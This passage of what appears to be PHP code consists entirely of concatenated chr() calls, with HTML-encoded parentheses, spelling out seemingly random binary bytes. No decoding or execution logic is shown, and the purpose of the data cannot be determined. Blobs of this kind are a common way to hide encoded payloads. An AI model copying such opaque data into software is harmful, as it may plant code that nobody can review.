       chr&#40;85&#41;. chr&#40;250&#41;.chr&#40;79&#41;. chr&#40;32&#41;. chr&#40;97&#41;. chr&#40;173&#41;.chr&#40;109&#41;.chr&#40;198&#41;.
       chr&#40;171&#41;.chr&#40;146&#41;.chr&#40;79&#41;. chr&#40;188&#41;.chr&#40;226&#41;.chr&#40;1&#41;.  chr&#40;54&#41;. chr&#40;203&#41;.
       chr&#40;17&#41;. chr&#40;110&#41;.chr&#40;244&#41;.chr&#40;136&#41;.chr&#40;157&#41;.chr&#40;43&#41;. chr&#40;5&#41;.  chr&#40;251&#41;.
       chr&#40;135&#41;.chr&#40;98&#41;. chr&#40;184&#41;.chr&#40;145&#41;.chr&#40;214&#41;.chr&#40;133&#41;.chr&#40;152&#41;.chr&#40;174&#41;.
       chr&#40;162&#41;.chr&#40;218&#41;.chr&#40;198&#41;.chr&#40;27&#41;. chr&#40;57&#41;. chr&#40;137&#41;.chr&#40;151&#41;.chr&#40;241&#41;.
       chr&#40;180&#41;.chr&#40;171&#41;.chr&#40;203&#41;.chr&#40;118&#41;.chr&#40;209&#41;.chr&#40;88&#41;. chr&#40;183&#41;.chr&#40;10&#41;.
       chr&#40;11&#41;. chr&#40;222&#41;.chr&#40;108&#41;.chr&#40;48&#41;. chr&#40;159&#41;.chr&#40;78&#41;. chr&#40;188&#41;.chr&#40;27&#41;.
       chr&#40;26&#41;. chr&#40;52&#41;. chr&#40;30&#41;. chr&#40;49&#41;. chr&#40;21&#41;. chr&#40;17&#41;. chr&#40;105&#41;.chr&#40;5&#41;.
       chr&#40;100&#41;.chr&#40;99&#41;. chr&#40;123&#41;.chr&#40;90&#41;. chr&#40;242&#41;.chr&#40;132&#41;.chr&#40;169&#41;.chr&#40;241&#41;.
       chr&#40;43&#41;. chr&#40;155&#41;.chr&#40;188&#41;.chr&#40;29&#41;. chr&#40;67&#41;. chr&#40;98&#41;. chr&#40;48&#41;. chr&#40;121&#41;.
       chr&#40;55&#41;. chr&#40;207&#41;.chr&#40;110&#41;.chr&#40;47&#41;. chr&#40;34&#41;. chr&#40;151&#41;.chr&#40;193&#41;.chr&#40;95&#41;.
       chr&#40;72&#41;. chr&#40;88&#41;. chr&#40;219&#41;.chr&#40;241&#41;.chr&#40;190&#41;.chr&#40;174&#41;.chr&#40;150&#41;.chr&#40;32&#41;.
       chr&#40;171&#41;.chr&#40;124&#41;.chr&#40;237&#41;.chr&#40;244&#41;.chr&#40;78&#41;. chr&#40;123&#41;.chr&#40;95&#41;. chr&#40;97&#41;.
       chr&#40;173&#41;.chr&#40;175&#41;.chr&#40;159&#41;.chr&#40;48&#41;. chr&#40;248&#41;.chr&#40;130&#41;.chr&#40;87&#41;. chr&#40;19&#41;.
       chr&#40;40&#41;. chr&#40;3&#41;.  chr&#40;82&#41;. chr&#40;218&#41;.chr&#40;73&#41;. chr&#40;48&#41;. chr&#40;10&#41;. chr&#40;79&#41;.
       chr&#40;131&#41;.chr&#40;191&#41;.chr&#40;88&#41;. chr&#40;164&#41;.chr&#40;234&#41;.chr&#40;240&#41;.chr&#40;18&#41;. chr&#40;17&#41;.
       chr&#40;194&#41;.chr&#40;176&#41;.chr&#40;179&#41;.chr&#40;215&#41;.chr&#40;201&#41;.chr&#40;36&#41;. chr&#40;6&#41;.  chr&#40;72&#41;.
       chr&#40;184&#41;.chr&#40;36&#41;. chr&#40;123&#41;.chr&#40;102&#41;.chr&#40;189&#41;.chr&#40;152&#41;.chr&#40;253&#41;.chr&#40;71&#41;.
       chr&#40;79&#41;. chr&#40;29&#41;. chr&#40;106&#41;.chr&#40;48&#41;. chr&#40;18&#41;. chr&#40;141&#41;.chr&#40;100&#41;.chr&#40;216&#41;.
       chr&#40;54&#41;. chr&#40;187&#41;.chr&#40;241&#41;.chr&#40;69&#41;. chr&#40;113&#41;.chr&#40;162&#41;.chr&#40;193&#41;.chr&#40;87&#41;.
       chr&#40;208&#41;.chr&#40;156&#41;.chr&#40;200&#41;.chr&#40;80&#41;. chr&#40;92&#41;. chr&#40;38&#41;. chr&#40;85&#41;. chr&#40;48&#41;.
       chr&#40;29&#41;. chr&#40;241&#41;.chr&#40;111&#41;.chr&#40;82&#41;. chr&#40;220&#41;.chr&#40;32&#41;. chr&#40;210&#41;.chr&#40;109&#41;.
       chr&#40;113&#41;.chr&#40;238&#41;.chr&#40;136&#41;.chr&#40;204&#41;.chr&#40;85&#41;. chr&#40;214&#41;.chr&#40;13&#41;. chr&#40;52&#41;.
       chr&#40;193&#41;.chr&#40;100&#41;.chr&#40;45&#41;. chr&#40;85&#41;. chr&#40;188&#41;.chr&#40;103&#41;.chr&#40;169&#41;.chr&#40;104&#41;.
       chr&#40;27&#41;. chr&#40;159&#41;.chr&#40;201&#41;.chr&#40;104&#41;.chr&#40;216&#41;.chr&#40;152&#41;.chr&#40;151&#41;.chr&#40;139&#41;.
       chr&#40;65&#41;. chr&#40;22&#41;. chr&#40;5&#41;.  chr&#40;91&#41;. chr&#40;76&#41;. chr&#40;29&#41;. chr&#40;129&#41;.chr&#40;123&#41;.
       chr&#40;150&#41;.chr&#40;161&#41;.chr&#40;150&#41;.chr&#40;43&#41;. chr&#40;93&#41;. chr&#40;25&#41;. chr&#40;250&#41;.chr&#40;6&#41;.
       chr&#40;76&#41;. chr&#40;26&#41;. chr&#40;203&#41;.chr&#40;36&#41;. chr&#40;188&#41;.chr&#40;91&#41;. chr&#40;50&#41;. chr&#40;36&#41;.
       chr&#40;165&#41;.chr&#40;38&#41;. chr&#40;177&#41;.chr&#40;152&#41;.chr&#40;66&#41;. chr&#40;116&#41;.chr&#40;19&#41;. chr&#40;239&#41;.
       chr&#40;245&#41;.chr&#40;105&#41;.chr&#40;34&#41;. chr&#40;42&#41;. chr&#40;184&#41;.chr&#40;244&#41;.chr&#40;201&#41;.chr&#40;79&#41;.
       chr&#40;205&#41;.chr&#40;156&#41;.chr&#40;123&#41;.chr&#40;166&#41;.chr&#40;137&#41;.chr&#40;63&#41;. chr&#40;144&#41;.chr&#40;97&#41;.
       chr&#40;237&#41;.chr&#40;89&#41;. chr&#40;134&#41;.chr&#40;81&#41;. chr&#40;41&#41;. chr&#40;198&#41;.chr&#40;252&#41;.chr&#40;59&#41;.
       chr&#40;166&#41;.chr&#40;72&#41;. chr&#40;191&#41;.chr&#40;171&#41;.chr&#40;228&#41;.chr&#40;176&#41;.chr&#40;185&#41;.chr&#40;219&#41;.
       chr&#40;119&#41;.chr&#40;90&#41;. chr&#40;199&#41;.chr&#40;91&#41;. chr&#40;6&#41;.  chr&#40;61&#41;. chr&#40;161&#41;.chr&#40;58&#41;.
       chr&#40;128&#41;.chr&#40;112&#41;.chr&#40;255&#41;.chr&#40;147&#41;.chr&#40;192&#41;.chr&#40;193&#41;.chr&#40;94&#41;. chr&#40;102&#41;.
       chr&#40;223&#41;.chr&#40;166&#41;.chr&#40;155&#41;.chr&#40;4&#41;.  chr&#40;250&#41;.chr&#40;232&#41;.chr&#40;30&#41;. chr&#40;169&#41;.
       chr&#40;225&#41;.chr&#40;208&#41;.chr&#40;47&#41;. chr&#40;55&#41;. chr&#40;213&#41;.chr&#40;101&#41;.chr&#40;152&#41;.chr&#40;206&#41;.
       chr&#40;14&#41;. chr&#40;129&#41;.chr&#40;80&#41;. chr&#40;131&#41;.chr&#40;98&#41;. chr&#40;102&#41;.chr&#40;240&#41;.chr&#40;231&#41;.
       chr&#40;171&#41;.chr&#40;225&#41;.chr&#40;193&#41;.chr&#40;95&#41;. chr&#40;69&#41;. chr&#40;138&#41;.chr&#40;42&#41;. chr&#40;177&#41;.
       chr&#40;6&#41;.  chr&#40;56&#41;. chr&#40;3&#41;.  chr&#40;250&#41;.chr&#40;209&#41;.chr&#40;152&#41;.chr&#40;220&#41;.chr&#40;254&#41;.
       chr&#40;131&#41;.chr&#40;240&#41;.chr&#40;54&#41;. chr&#40;67&#41;. chr&#40;77&#41;. chr&#40;199&#41;.chr&#40;106&#41;.chr&#40;29&#41;.
       chr&#40;60&#41;. chr&#40;137&#41;.chr&#40;77&#41;. chr&#40;41&#41;. chr&#40;119&#41;.chr&#40;8&#41;.  chr&#40;186&#41;.chr&#40;61&#41;.
       chr&#40;70&#41;. chr&#40;247&#41;.chr&#40;6&#41;.  chr&#40;185&#41;.chr&#40;122&#41;.chr&#40;100&#41;.chr&#40;91&#41;. chr&#40;44&#41;.
       chr&#40;7&#41;.  chr&#40;136&#41;.chr&#40;188&#41;.chr&#40;250&#41;.chr&#40;146&#41;.chr&#40;181&#41;.chr&#40;197&#41;.chr&#40;219&#41;.
       chr&#40;10&#41;. chr&#40;68&#41;. chr&#40;75&#41;. chr&#40;213&#41;.chr&#40;27&#41;. chr&#40;81&#41;. chr&#40;168&#41;.chr&#40;166&#41;.
       chr&#40;28&#41;. chr&#40;105&#41;.chr&#40;76&#41;. chr&#40;179&#41;.chr&#40;208&#41;.chr&#40;162&#41;.chr&#40;12&#41;. chr&#40;54&#41;.
       chr&#40;249&#41;.chr&#40;14&#41;. chr&#40;154&#41;.chr&#40;84&#41;. chr&#40;168&#41;.chr&#40;97&#41;. chr&#40;111&#41;.chr&#40;40&#41;.
       chr&#40;2&#41;.  chr&#40;159&#41;.chr&#40;155&#41;.chr&#40;50&#41;. chr&#40;116&#41;.chr&#40;124&#41;.chr&#40;185&#41;.chr&#40;100&#41;.
       chr&#40;54&#41;. chr&#40;49&#41;. chr&#40;12&#41;. chr&#40;107&#41;.chr&#40;206&#41;.chr&#40;252&#41;.chr&#40;68&#41;. chr&#40;82&#41;.
       chr&#40;10&#41;. chr&#40;4&#41;.  chr&#40;171&#41;.chr&#40;184&#41;.chr&#40;166&#41;.chr&#40;26&#41;. chr&#40;76&#41;. chr&#40;31&#41;.
       chr&#40;224&#41;.chr&#40;52&#41;. chr&#40;84&#41;. chr&#40;157&#41;.chr&#40;46&#41;. chr&#40;15&#41;. chr&#40;92&#41;. chr&#40;169&#41;.
       chr&#40;24&#41;. chr&#40;58&#41;. chr&#40;49&#41;. chr&#40;89&#41;. chr&#40;7&#41;.  chr&#40;2&#41;.  chr&#40;122&#41;.chr&#40;54&#41;.
       chr&#40;57&#41;. chr&#40;224&#41;.chr&#40;226&#41;.chr&#40;231&#41;.chr&#40;27&#41;. chr&#40;163&#41;.chr&#40;206&#41;.chr&#40;248&#41;.
       chr&#40;14&#41;. chr&#40;39&#41;. chr&#40;55&#41;. chr&#40;153&#41;.chr&#40;69&#41;. chr&#40;38&#41;. chr&#40;134&#41;.chr&#40;87&#41;.
       chr&#40;143&#41;.chr&#40;206&#41;.chr&#40;218&#41;.chr&#40;170&#41;.chr&#40;125&#41;.chr&#40;13&#41;. chr&#40;68&#41;. chr&#40;83&#41;.
       chr&#40;60&#41;. chr&#40;234&#41;.chr&#40;3&#41;.  chr&#40;7&#41;.  chr&#40;93&#41;. chr&#40;30&#41;. chr&#40;218&#41;.chr&#40;53&#41;.
       chr&#40;230&#41;.chr&#40;209&#41;.chr&#40;177&#41;.chr&#40;1&#41;.  chr&#40;195&#41;.chr&#40;39&#41;. chr&#40;155&#41;.chr&#40;189&#41;.
       chr&#40;252&#41;.chr&#40;210&#41;.chr&#40;175&#41;.chr&#40;139&#41;.chr&#40;40&#41;. chr&#40;182&#41;.chr&#40;206&#41;.chr&#40;110&#41;.
       chr&#40;255&#41;.chr&#40;40&#41;. chr&#40;174&#41;.chr&#40;140&#41;.chr&#40;119&#41;.chr&#40;168&#41;.chr&#40;66&#41;. chr&#40;171&#41;.
       chr&#40;86&#41;. chr&#40;76&#41;. chr&#40;92&#41;. chr&#40;98&#41;. chr&#40;80&#41;. chr&#40;102&#41;.chr&#40;63&#41;. chr&#40;18&#41;.
       chr&#40;68&#41;. chr&#40;171&#41;.chr&#40;160&#41;.chr&#40;18&#41;. chr&#40;226&#41;.chr&#40;169&#41;.chr&#40;152&#41;.chr&#40;148&#41;.
       chr&#40;170&#41;.chr&#40;8&#41;.  chr&#40;221&#41;.chr&#40;253&#41;.chr&#40;129&#41;.chr&#40;75&#41;. chr&#40;196&#41;.chr&#40;119&#41;.
       chr&#40;60&#41;. chr&#40;36&#41;. chr&#40;134&#41;.chr&#40;183&#41;.chr&#40;150&#41;.chr&#40;87&#41;. chr&#40;81&#41;. chr&#40;178&#41;.
       chr&#40;201&#41;.chr&#40;187&#41;.chr&#40;221&#41;.chr&#40;7&#41;.  chr&#40;129&#41;.chr&#40;171&#41;.chr&#40;103&#41;.chr&#40;96&#41;.
       chr&#40;154&#41;.chr&#40;34&#41;. chr&#40;145&#41;.chr&#40;75&#41;. chr&#40;62&#41;. chr&#40;127&#41;.chr&#40;215&#41;.chr&#40;179&#41;.
       chr&#40;128&#41;.chr&#40;246&#41;.chr&#40;211&#41;.chr&#40;46&#41;. chr&#40;217&#41;.chr&#40;67&#41;. chr&#40;199&#41;.chr&#40;187&#41;.
       chr&#40;48&#41;. chr&#40;155&#41;.chr&#40;141&#41;.chr&#40;96&#41;. chr&#40;159&#41;.chr&#40;54&#41;. chr&#40;32&#41;. chr&#40;219&#41;.
       chr&#40;105&#41;.chr&#40;91&#41;. chr&#40;102&#41;.chr&#40;218&#41;.chr&#40;205&#41;.chr&#40;196&#41;.chr&#40;188&#41;.chr&#40;206&#41;.
       chr&#40;123&#41;.chr&#40;56&#41;. chr&#40;123&#41;.chr&#40;146&#41;.chr&#40;115&#41;.chr&#40;63&#41;. chr&#40;41&#41;. chr&#40;45&#41;.
       chr&#40;41&#41;. chr&#40;36&#41;. chr&#40;225&#41;.chr&#40;64&#41;. chr&#40;34&#41;. chr&#40;105&#41;.chr&#40;210&#41;.chr&#40;9&#41;.
       chr&#40;138&#41;.chr&#40;210&#41;.chr&#40;241&#41;.chr&#40;77&#41;. chr&#40;175&#41;.chr&#40;47&#41;. chr&#40;193&#41;.chr&#40;247&#41;.
       chr&#40;15&#41;. chr&#40;17&#41;. chr&#40;29&#41;. chr&#40;31&#41;. chr&#40;195&#41;.chr&#40;131&#41;.chr&#40;197&#41;.chr&#40;227&#41;.
       chr&#40;120&#41;.chr&#40;80&#41;. chr&#40;236&#41;.chr&#40;61&#41;. chr&#40;169&#41;.chr&#40;255&#41;.chr&#40;99&#41;. chr&#40;91&#41;.
       chr&#40;64&#41;. chr&#40;66&#41;. chr&#40;40&#41;. chr&#40;66&#41;. chr&#40;47&#41;. chr&#40;194&#41;.chr&#40;196&#41;.chr&#40;173&#41;.
       chr&#40;224&#41;.chr&#40;204&#41;.chr&#40;17&#41;. chr&#40;0&#41;.  chr&#40;133&#41;.chr&#40;97&#41;. chr&#40;88&#41;. chr&#40;80&#41;.
       chr&#40;10&#41;. chr&#40;190&#41;.chr&#40;118&#41;.chr&#40;211&#41;.chr&#40;119&#41;.chr&#40;24&#41;. chr&#40;117&#41;.chr&#40;236&#41;.
       chr&#40;220&#41;.chr&#40;222&#41;.chr&#40;80&#41;. chr&#40;224&#41;.chr&#40;67&#41;. chr&#40;100&#41;.chr&#40;113&#41;.chr&#40;83&#41;.
       chr&#40;125&#41;.chr&#40;138&#41;.chr&#40;212&#41;.chr&#40;106&#41;.chr&#40;133&#41;.chr&#40;1&#41;.  chr&#40;103&#41;.chr&#40;145&#41;.
       chr&#40;63&#41;. chr&#40;183&#41;.chr&#40;38&#41;. chr&#40;236&#41;.chr&#40;124&#41;.chr&#40;229&#41;.chr&#40;80&#41;. chr&#40;44&#41;.
       chr&#40;10&#41;. chr&#40;102&#41;.chr&#40;149&#41;.chr&#40;117&#41;.chr&#40;120&#41;.chr&#40;211&#41;.chr&#40;99&#41;. chr&#40;252&#41;.
       chr&#40;146&#41;.chr&#40;206&#41;.chr&#40;175&#41;.chr&#40;104&#41;.chr&#40;107&#41;.chr&#40;131&#41;.chr&#40;87&#41;. chr&#40;29&#41;.
       chr&#40;43&#41;. chr&#40;57&#41;. chr&#40;48&#41;. chr&#40;213&#41;.chr&#40;118&#41;.chr&#40;111&#41;.chr&#40;73&#41;. chr&#40;69&#41;.
       chr&#40;75&#41;. chr&#40;105&#41;.chr&#40;145&#41;.chr&#40;40&#41;. chr&#40;200&#41;.chr&#40;169&#41;.chr&#40;222&#41;.chr&#40;4&#41;.
       chr&#40;95&#41;. chr&#40;10&#41;. chr&#40;31&#41;. chr&#40;222&#41;.chr&#40;48&#41;. chr&#40;248&#41;.chr&#40;133&#41;.chr&#40;46&#41;.
       chr&#40;89&#41;. chr&#40;158&#41;.chr&#40;133&#41;.chr&#40;37&#41;. chr&#40;145&#41;.chr&#40;82&#41;. chr&#40;65&#41;. chr&#40;157&#41;.
       chr&#40;42&#41;. chr&#40;192&#41;.chr&#40;44&#41;. chr&#40;141&#41;.chr&#40;67&#41;. chr&#40;25&#41;. chr&#40;175&#41;.chr&#40;70&#41;.
       chr&#40;149&#41;.chr&#40;41&#41;. chr&#40;76&#41;. chr&#40;123&#41;.chr&#40;6&#41;.  chr&#40;127&#41;.chr&#40;22&#41;. chr&#40;228&#41;.
       chr&#40;223&#41;.chr&#40;2&#41;.  chr&#40;193&#41;.chr&#40;170&#41;.chr&#40;172&#41;.chr&#40;86&#41;. chr&#40;34&#41;. chr&#40;124&#41;.
       chr&#40;246&#41;.chr&#40;82&#41;. chr&#40;80&#41;. chr&#40;138&#41;.chr&#40;60&#41;. chr&#40;130&#41;.chr&#40;141&#41;.chr&#40;113&#41;.
       chr&#40;155&#41;.chr&#40;107&#41;.chr&#40;148&#41;.chr&#40;89&#41;. chr&#40;128&#41;.chr&#40;41&#41;. chr&#40;48&#41;. chr&#40;43&#41;.
       chr&#40;126&#41;.chr&#40;148&#41;.chr&#40;92&#41;. chr&#40;132&#41;.chr&#40;2&#41;.  chr&#40;212&#41;.chr&#40;235&#41;.chr&#40;21&#41;.
       chr&#40;93&#41;. chr&#40;109&#41;.chr&#40;48&#41;. chr&#40;203&#41;.chr&#40;242&#41;.chr&#40;244&#41;.chr&#40;51&#41;. chr&#40;210&#41;.
       chr&#40;239&#41;.chr&#40;146&#41;.chr&#40;104&#41;.chr&#40;26&#41;. chr&#40;150&#41;.chr&#40;73&#41;. chr&#40;222&#41;.chr&#40;155&#41;.
       chr&#40;79&#41;. chr&#40;19&#41;. chr&#40;140&#41;.chr&#40;176&#41;.chr&#40;138&#41;.chr&#40;31&#41;. chr&#40;100&#41;.chr&#40;86&#41;.
       chr&#40;238&#41;.chr&#40;40&#41;. chr&#40;222&#41;.chr&#40;210&#41;.chr&#40;61&#41;. chr&#40;58&#41;. chr&#40;189&#41;.chr&#40;168&#41;.
       chr&#40;87&#41;. chr&#40;68&#41;. chr&#40;211&#41;.chr&#40;50&#41;. chr&#40;207&#41;.chr&#40;194&#41;.chr&#40;171&#41;.chr&#40;197&#41;.
       chr&#40;164&#41;.chr&#40;83&#41;. chr&#40;24&#41;. chr&#40;118&#41;.chr&#40;185&#41;.chr&#40;205&#41;.chr&#40;85&#41;. chr&#40;176&#41;.
       chr&#40;224&#41;.chr&#40;197&#41;.chr&#40;20&#41;. chr&#40;208&#41;.chr&#40;89&#41;. chr&#40;233&#41;.chr&#40;36&#41;. chr&#40;60&#41;.
       chr&#40;179&#41;.chr&#40;178&#41;.chr&#40;26&#41;. chr&#40;145&#41;.chr&#40;89&#41;. chr&#40;174&#41;.chr&#40;3&#41;.  chr&#40;154&#41;.
       chr&#40;249&#41;.chr&#40;176&#41;.chr&#40;37&#41;. chr&#40;135&#41;.chr&#40;206&#41;.chr&#40;248&#41;.chr&#40;149&#41;.chr&#40;213&#41;.
       chr&#40;125&#41;.chr&#40;35&#41;. chr&#40;173&#41;.chr&#40;136&#41;.chr&#40;82&#41;. chr&#40;216&#41;.chr&#40;243&#41;.chr&#40;73&#41;.
       chr&#40;113&#41;.chr&#40;243&#41;.chr&#40;215&#41;.chr&#40;84&#41;. chr&#40;81&#41;. chr&#40;181&#41;.chr&#40;100&#41;.chr&#40;11&#41;.
       chr&#40;211&#41;.chr&#40;105&#41;.chr&#40;147&#41;.chr&#40;69&#41;. chr&#40;172&#41;.chr&#40;152&#41;.chr&#40;85&#41;. chr&#40;25&#41;.
       chr&#40;190&#41;.chr&#40;227&#41;.chr&#40;20&#41;. chr&#40;208&#41;.chr&#40;8&#41;.  chr&#40;208&#41;.chr&#40;233&#41;.chr&#40;121&#41;.
       chr&#40;214&#41;.chr&#40;96&#41;. chr&#40;150&#41;.chr&#40;243&#41;.chr&#40;152&#41;.chr&#40;115&#41;.chr&#40;111&#41;.chr&#40;136&#41;.
       chr&#40;232&#41;.chr&#40;180&#41;.chr&#40;18&#41;. chr&#40;23&#41;. chr&#40;119&#41;.chr&#40;241&#41;.chr&#40;41&#41;. chr&#40;130&#41;.
       chr&#40;121&#41;.chr&#40;202&#41;.chr&#40;18&#41;. chr&#40;155&#41;.chr&#40;178&#41;.chr&#40;14&#41;. chr&#40;143&#41;.chr&#40;195&#41;.
       chr&#40;111&#41;.chr&#40;119&#41;.chr&#40;42&#41;. chr&#40;102&#41;.chr&#40;193&#41;.chr&#40;164&#41;.chr&#40;156&#41;.chr&#40;103&#41;.
       chr&#40;7&#41;.  chr&#40;126&#41;.chr&#40;69&#41;. chr&#40;102&#41;.chr&#40;201&#41;.chr&#40;117&#41;.chr&#40;71&#41;. chr&#40;136&#41;.
       chr&#40;204&#41;.chr&#40;18&#41;. chr&#40;111&#41;.chr&#40;77&#41;. chr&#40;20&#41;. chr&#40;23&#41;. chr&#40;97&#41;. chr&#40;18&#41;.
       chr&#40;132&#41;.chr&#40;234&#41;.chr&#40;213&#41;.chr&#40;175&#41;.chr&#40;148&#41;.chr&#40;155&#41;.chr&#40;80&#41;. chr&#40;113&#41;.
       chr&#40;51&#41;. chr&#40;214&#41;.chr&#40;79&#41;. chr&#40;29&#41;. chr&#40;162&#41;.chr&#40;44&#41;. chr&#40;175&#41;.chr&#40;213&#41;.
       chr&#40;39&#41;. chr&#40;102&#41;.chr&#40;121&#41;.chr&#40;236&#41;.chr&#40;46&#41;. chr&#40;64&#41;. chr&#40;34&#41;. chr&#40;179&#41;.
       chr&#40;0&#41;.  chr&#40;88&#41;. chr&#40;199&#41;.chr&#40;44&#41;. chr&#40;145&#41;.chr&#40;120&#41;.chr&#40;211&#41;.chr&#40;19&#41;.
       chr&#40;33&#41;. chr&#40;191&#41;.chr&#40;188&#41;.chr&#40;133&#41;.chr&#40;74&#41;. chr&#40;80&#41;. chr&#40;28&#41;. chr&#40;191&#41;.
       chr&#40;210&#41;.chr&#40;25&#41;. chr&#40;15&#41;. chr&#40;133&#41;.chr&#40;134&#41;.chr&#40;219&#41;.chr&#40;193&#41;.chr&#40;50&#41;.
       chr&#40;248&#41;.chr&#40;154&#41;.chr&#40;89&#41;. chr&#40;222&#41;.chr&#40;164&#41;.chr&#40;28&#41;. chr&#40;110&#41;.chr&#40;145&#41;.
       chr&#40;89&#41;. chr&#40;189&#41;.chr&#40;222&#41;.chr&#40;218&#41;.chr&#40;32&#41;. chr&#40;179&#41;.chr&#40;36&#41;. chr&#40;51&#41;.
       chr&#40;203&#41;.chr&#40;127&#41;.chr&#40;226&#41;.chr&#40;250&#41;.chr&#40;44&#41;. chr&#40;16&#41;. chr&#40;178&#41;.chr&#40;100&#41;.
       chr&#40;246&#41;.chr&#40;203&#41;.chr&#40;132&#41;.chr&#40;52&#41;. chr&#40;181&#41;.chr&#40;168&#41;.chr&#40;98&#41;. chr&#40;35&#41;.
       chr&#40;127&#41;.chr&#40;88&#41;. chr&#40;70&#41;. chr&#40;201&#41;.chr&#40;172&#41;.chr&#40;129&#41;.chr&#40;82&#41;. chr&#40;208&#41;.
       chr&#40;35&#41;. chr&#40;219&#41;.chr&#40;218&#41;.chr&#40;132&#41;.chr&#40;26&#41;. chr&#40;199&#41;.chr&#40;172&#41;.chr&#40;171&#41;.
       chr&#40;190&#41;.chr&#40;15&#41;. chr&#40;70&#41;. chr&#40;152&#41;.chr&#40;37&#41;. chr&#40;253&#41;.chr&#40;243&#41;.chr&#40;173&#41;.
       chr&#40;126&#41;.chr&#40;14&#41;. chr&#40;100&#41;.chr&#40;55&#41;. chr&#40;67&#41;. chr&#40;147&#41;.chr&#40;135&#41;.chr&#40;60&#41;.
       chr&#40;249&#41;.chr&#40;226&#41;.chr&#40;35&#41;. chr&#40;185&#41;.chr&#40;31&#41;. chr&#40;196&#41;.chr&#40;138&#41;.chr&#40;89&#41;.
       chr&#40;217&#41;.chr&#40;224&#41;.chr&#40;83&#41;. chr&#40;158&#41;.chr&#40;5&#41;.  chr&#40;247&#41;.chr&#40;184&#41;.chr&#40;209&#41;.
       chr&#40;92&#41;. chr&#40;199&#41;.chr&#40;80&#41;. chr&#40;6&#41;.  chr&#40;151&#41;.chr&#40;246&#41;.chr&#40;191&#41;.chr&#40;220&#41;.
       chr&#40;48&#41;. chr&#40;80&#41;. chr&#40;243&#41;.chr&#40;204&#41;.chr&#40;226&#41;.chr&#40;219&#41;.chr&#40;20&#41;. chr&#40;21&#41;.
       chr&#40;97&#41;. chr&#40;59&#41;. chr&#40;94&#41;. chr&#40;175&#41;.chr&#40;80&#41;. chr&#40;10&#41;. chr&#40;93&#41;. chr&#40;92&#41;.
       chr&#40;218&#41;.chr&#40;27&#41;. chr&#40;15&#41;. chr&#40;25&#41;. chr&#40;162&#41;.chr&#40;103&#41;.chr&#40;161&#41;.chr&#40;226&#41;.
       chr&#40;152&#41;.chr&#40;193&#41;.chr&#40;99&#41;. chr&#40;183&#41;.chr&#40;161&#41;.chr&#40;42&#41;. chr&#40;49&#41;. chr&#40;2&#41;.
       chr&#40;185&#41;.chr&#40;191&#41;.chr&#40;97&#41;. chr&#40;113&#41;.chr&#40;181&#41;.chr&#40;81&#41;. chr&#40;55&#41;. chr&#40;136&#41;.
       chr&#40;49&#41;. chr&#40;107&#41;.chr&#40;100&#41;.chr&#40;181&#41;.chr&#40;152&#41;.chr&#40;178&#41;.chr&#40;39&#41;. chr&#40;104&#41;.
       chr&#40;252&#41;.chr&#40;174&#41;.chr&#40;48&#41;. chr&#40;204&#41;.chr&#40;156&#41;.chr&#40;119&#41;.chr&#40;41&#41;. chr&#40;23&#41;.
       chr&#40;106&#41;.chr&#40;99&#41;. chr&#40;62&#41;. chr&#40;64&#41;. chr&#40;47&#41;. chr&#40;98&#41;. chr&#40;48&#41;. chr&#40;78&#41;.
       chr&#40;40&#41;. chr&#40;74&#41;. chr&#40;192&#41;.chr&#40;172&#41;.chr&#40;14&#41;. chr&#40;137&#41;.chr&#40;181&#41;.chr&#40;245&#41;.
       chr&#40;134&#41;.chr&#40;54&#41;. chr&#40;216&#41;.chr&#40;100&#41;.chr&#40;199&#41;.chr&#40;150&#41;.chr&#40;194&#41;.chr&#40;95&#41;.
       chr&#40;21&#41;. chr&#40;7&#41;.  chr&#40;187&#41;.chr&#40;126&#41;.chr&#40;243&#41;.chr&#40;39&#41;. chr&#40;174&#41;.chr&#40;50&#41;.
       chr&#40;57&#41;. chr&#40;254&#41;.chr&#40;172&#41;.chr&#40;98&#41;. chr&#40;138&#41;.chr&#40;69&#41;. chr&#40;212&#41;.chr&#40;204&#41;.
       chr&#40;86&#41;. chr&#40;148&#41;.chr&#40;143&#41;.chr&#40;104&#41;.chr&#40;252&#41;.chr&#40;49&#41;. chr&#40;28&#41;. chr&#40;16&#41;.
       chr&#40;25&#41;. chr&#40;158&#41;.chr&#40;53&#41;. chr&#40;254&#41;.chr&#40;175&#41;.chr&#40;163&#41;.chr&#40;88&#41;. chr&#40;175&#41;.
       chr&#40;110&#41;.chr&#40;236&#41;.chr&#40;30&#41;. chr&#40;59&#41;. chr&#40;21&#41;. chr&#40;183&#41;.chr&#40;145&#41;.chr&#40;22&#41;.
       chr&#40;145&#41;.chr&#40;252&#41;.chr&#40;100&#41;.chr&#40;37&#41;. chr&#40;62&#41;. chr&#40;10&#41;. chr&#40;229&#41;.chr&#40;69&#41;.
       chr&#40;164&#41;.chr&#40;99&#41;. chr&#40;90&#41;. chr&#40;200&#41;.chr&#40;104&#41;.chr&#40;244&#41;.chr&#40;97&#41;. chr&#40;172&#41;.
       chr&#40;100&#41;.chr&#40;168&#41;.chr&#40;174&#41;.chr&#40;144&#41;.chr&#40;200&#41;.chr&#40;48&#41;. chr&#40;236&#41;.chr&#40;146&#41;.
       chr&#40;131&#41;.chr&#40;193&#41;.chr&#40;159&#41;.chr&#40;56&#41;. chr&#40;161&#41;.chr&#40;171&#41;.chr&#40;93&#41;. chr&#40;117&#41;.
       chr&#40;167&#41;.chr&#40;193&#41;.chr&#40;51&#41;. chr&#40;29&#41;. chr&#40;142&#41;.chr&#40;34&#41;. chr&#40;130&#41;.chr&#40;11&#41;.
       chr&#40;231&#41;.chr&#40;214&#41;.chr&#40;51&#41;. chr&#40;25&#41;. chr&#40;222&#41;.chr&#40;142&#41;.chr&#40;123&#41;.chr&#40;79&#41;.
       chr&#40;29&#41;. chr&#40;168&#41;.chr&#40;12&#41;. chr&#40;195&#41;.chr&#40;13&#41;. chr&#40;210&#41;.chr&#40;26&#41;. chr&#40;225&#41;.
       chr&#40;51&#41;. chr&#40;25&#41;. chr&#40;5&#41;.  chr&#40;66&#41;. chr&#40;13&#41;. chr&#40;127&#41;.chr&#40;179&#41;.chr&#40;103&#41;.
       chr&#40;240&#41;.chr&#40;91&#41;. chr&#40;184&#41;.chr&#40;76&#41;. chr&#40;246&#41;.chr&#40;117&#41;.chr&#40;165&#41;.chr&#40;62&#41;.
       chr&#40;171&#41;.chr&#40;184&#41;.chr&#40;221&#41;.chr&#40;129&#41;.chr&#40;95&#41;. chr&#40;120&#41;.chr&#40;47&#41;. chr&#40;131&#41;.
